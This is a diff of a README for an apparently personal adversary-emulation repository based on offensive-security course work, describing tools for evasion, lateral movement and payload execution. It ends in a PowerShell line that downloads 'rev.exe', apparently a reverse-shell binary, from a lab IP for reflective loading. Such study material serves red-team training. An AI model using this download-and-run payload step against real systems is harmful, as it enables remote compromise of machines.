tanaka-geek/Adversary-Simulation-Codes/README.md

-# OSEP Code Snippets
+# Adversary Emulation Code Repository

+## Disclaimer
-Code examples are provided as-is, without any form of warranty.
-Based on Offensive Security's [PEN-300](https://www.offensive-security.com/pen300-osep/) course.
+All code examples in this repository are provided as-is, without any warranty or guarantee of functionality.
+This repository serves as a collection of code used in my adversary emulation studies.

-Classes and methods are public, so most binaries should allow for reflective loading as below.
+## Overview
+This repository contains various tools and techniques for adversary emulation, focusing on evasion, lateral movement, and payload execution.
+The code is structured for modularity, with public classes and methods to allow for reflective loading, as demonstrated below:

 ```powershell
 $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')